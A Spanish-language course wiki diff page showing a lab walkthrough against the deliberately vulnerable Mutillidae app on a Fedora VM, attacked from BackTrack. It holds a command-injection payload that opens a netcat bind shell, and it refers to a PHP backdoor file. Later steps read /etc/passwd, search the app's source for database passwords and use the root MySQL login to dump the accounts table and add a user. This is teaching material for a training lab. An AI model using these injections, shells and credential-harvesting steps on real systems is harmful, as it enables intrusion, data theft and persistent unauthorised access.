Seguridad y Alta Disponibilidad

Herramientas de usuario

Herramientas del sitio

Traza:
sad:fedora14:p3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión 		Revisión previa
sad:fedora14:p3 [2018/01/29 19:11]
José Manuel Guallar 		sad:fedora14:p3 [2019/01/04 13:18] (actual)
Línea 35: Línea 35:
   * BT tiene 192.168.153.43   * BT tiene 192.168.153.43
  
-1+{{:​sad:​fedora:​p3:​1.png?500|}}
  
 Vamos como el ejercicio anterior a http://​ip-fedora/​mutillidae y seleccionamos ​ Vamos como el ejercicio anterior a http://​ip-fedora/​mutillidae y seleccionamos ​
Línea 47: Línea 47:
 Instrucciones:​ Instrucciones:​
 <code basH> <code basH>
-www.colegiomontessori.com;​ mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444> /tmp/pipe+www.colegiomontessori.com;​ mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 </​code>​ </​code>​
  
Línea 55: Línea 55:
  
 Esto permitirá que dos procesos se conecten a netcat. Esto permitirá que dos procesos se conecten a netcat.
-<code bash> 
-nc -l 4444, le dice a netcat que escuche y permita conexiones en el puerto 4444. 
-</​code>​ 
  
-+**nc -l 4444,** le dice a netcat que escuche y permita conexiones en el puerto 4444. 
-3+ 
 + 
 +{{:​sad:​fedora:​p3:​2.png?500|}} 
 +{{:​sad:​fedora:​p3:​3.png?500|}}
  
 **NOTA**: NO SE MUESTRA NINGÚN RESULTADO EN LA EJECUCIÓN DE ESTA SENTENCIA **NOTA**: NO SE MUESTRA NINGÚN RESULTADO EN LA EJECUCIÓN DE ESTA SENTENCIA
Línea 74: Línea 74:
 Escribir las siguientes sentencias en el BackTrack Escribir las siguientes sentencias en el BackTrack
  
-Reemplazar ​192.168.1.111 ​con la dirección IP de Fedora.+Reemplazar ​la ip con la dirección IP de tu Fedora.
  
-**nc 192.168.153.39 4444**+<code bash> 
 +root@bt:​~# ​nc 192.168.153.39 4444 
 +</​code>​
  
-4+{{:​sad:​fedora:​p3:​04.png?​500|}}
  
 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444
  
-**hostname**+''​**hostname**''​
  
 Este es el nombre de host del servidor que aloja DVWA. Este es el nombre de host del servidor que aloja DVWA.
  
-**whoami**+''​**whoami**''​
  
 Es decir, ¿con quién me conecto? Es decir, ¿con quién me conecto?
  
-**pwd**+''​**pwd**''​
  
 directorio de trabajo directorio de trabajo
  
-**uname -a**+''​**uname -a**''​
  
-muestra informacion del sistema ​operatico+muestra informacion del sistema ​operativo
  
-**cat /etc/passwd > passwd.txt**+''​**cat /etc/passwd > passwd.txt**''​
  
 crea passwd.txt localizado en /​var/​www/​html/​multillidae crea passwd.txt localizado en /​var/​www/​html/​multillidae
-ls -l $PWD/​passwd.txt+ 
 +''​**ls -l $PWD/​passwd.txt**''​
  
 lista el fichero passwd.txt lista el fichero passwd.txt
  
-5+{{:​sad:​fedora:​p3:​05.png?​500|}}
  
 **volvemos al Firefox y abrimos otra pestaña y escribimos** **volvemos al Firefox y abrimos otra pestaña y escribimos**
  
-http://​ip-fedora/​mutillidae/​passwd.txt+''​** ​http://​ip-fedora/​mutillidae/​passwd.txt**''​
  
-06+{{:​sad:​fedora:​p3:​06.png?500|}}
  
 ====== Creación de una puerta trasera (PHP) ====== ====== Creación de una puerta trasera (PHP) ======
Línea 127: Línea 130:
 cat nc_connect.php cat nc_connect.php
 </​code>​ </​code>​
-7 
  
-http://ip-fedora/​multillidae/​nc_connect.php+{{:sad:fedora:p3:07.png?500|}}
  
-Ejecutamos ​nc_connect.php+''​**http://​ip-fedora/​mutillidae/​nc_connect.php**''​
  
-http://​ip-fedora/​multillidae/​nc_connect.php+Ejecutamos **nc_connect.php** 
 + 
 +''​**http://​ip-fedora/​mutillidae/​nc_connect.php**''​
  
 veremos que en la web pone conectando..... veremos que en la web pone conectando.....
Línea 141: Línea 145:
 <code bash> <code bash>
  
-root@bt:~# nc 192.168.1.111 3333+root@bt:~# nc 192.168.153.39 3333
 whoami whoami
 ps -eaf | egrep '​(3333|4444)'​ ps -eaf | egrep '​(3333|4444)'​
  
 </​code>​ </​code>​
-9 
  
-las dos primeras lineas es la ejecución del netcat via nslookup+{{:​sad:​fedora:​p3:​08.png?​500|}} 
 +{{:​sad:​fedora:​p3:​09.png?​500|}} 
 + 
 +Las dos primeras lineas es la ejecución del netcat via nslookup
  
 las ultimas lineas el la puerta trasera las ultimas lineas el la puerta trasera
Línea 156: Línea 162:
 primero vamos a ver nuestro directorio de trabajo primero vamos a ver nuestro directorio de trabajo
  
-**pwd**+''​**pwd**''​
  
-luego vamos a contar los scripts+luego vamos a contar los scripts\\
  
-**find * -name "​*.php"​ | wc -l**+''​**find * -name "​*.php"​ | wc -l**''​
  
-despues vamos a contar los archivos ​include ​de php+despues vamos a contar los archivos ​incluye ​de php\\
  
-**find * -name "​*.inc"​ | wc -l**+''​**find * -name "​*.inc"​ | wc -l**''​
  
-lo siguiente sera buscar en cada archivo include (.inc) las palabras "​password"​ "​db"​ o "​database"​+lo siguiente sera buscar en cada archivo include (.inc) las palabras "​password"​ "​db"​ o "​database"​\\ 
 + 
 +{{:​sad:​fedora:​p3:​10.png?​500|}}
  
 <code bash> <code bash>
Línea 180: Línea 188:
 **egrep -i '​(db|database)'​** buscar las cadenas db o database **egrep -i '​(db|database)'​** buscar las cadenas db o database
  
-11+{{:​sad:​fedora:​p3:​11.png?500|}}
  
 <code bash> <code bash>
Línea 186: Línea 194:
 </​code>​ </​code>​
  
 +{{:​sad:​fedora:​p3:​12.png?​500|}}
 ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php
  
Línea 193: Línea 202:
 find * -name "​MySQLHandler.php"​ | xargs egrep -i '​(password|username|database)'​ | grep "​="​ | head -10 find * -name "​MySQLHandler.php"​ | xargs egrep -i '​(password|username|database)'​ | grep "​="​ | head -10
 </​code>​ </​code>​
-13+{{:​sad:​fedora:​p3:​13.png?500|}}
  
 El siguiente comando muestra cómo ejecutar los comandos de la base de datos en la sesión de netcat. El siguiente comando muestra cómo ejecutar los comandos de la base de datos en la sesión de netcat.
Línea 201: Línea 210:
 echo "use nowasp; show tables;"​ | mysql -uroot -psamurai echo "use nowasp; show tables;"​ | mysql -uroot -psamurai
 </​code>​ </​code>​
-14 
  
-vamos a investigar el contenido de la tabla accounts+{{:​sad:​fedora:​p3:​14.png?​500|}} 
 + 
 +Vamos a investigar el contenido de la tabla accounts
  
 primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas
Línea 211: Línea 221:
 echo "​select * from nowasp.accounts;"​ | mysql -uroot -psamurai echo "​select * from nowasp.accounts;"​ | mysql -uroot -psamurai
 </​code>​ </​code>​
-15+ 
 +{{:​sad:​fedora:​p3:​15.png?500|}}
  
 ===== ahora vamos a crear un nuevo usuario en la tabla ===== ===== ahora vamos a crear un nuevo usuario en la tabla =====
Línea 220: Línea 231:
 echo "​select * from nowasp.accounts;"​ | mysql -uroot -psamurai echo "​select * from nowasp.accounts;"​ | mysql -uroot -psamurai
 </​code>​ </​code>​
-16 +{{:​sad:​fedora:​p3:​16.png?​500|}} 
-_+ 
 ''​** print de pantalla final**''​ ''​** print de pantalla final**''​
  
-Tienes que realizar los siguientes pasos en el terminal de netcat ​nc_config.php+Tienes que realizar los siguientes pasos en el terminal de netcat ​nc_connect.php
  
 <code bash> <code bash>
sad/fedora14/p3.1517253067.txt.gz · Última modificación: 2019/01/04 13:18 (editor externo)

Herramientas de la página

Excepto donde se indique lo contrario, el contenido de este wiki esta bajo la siguiente licencia: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki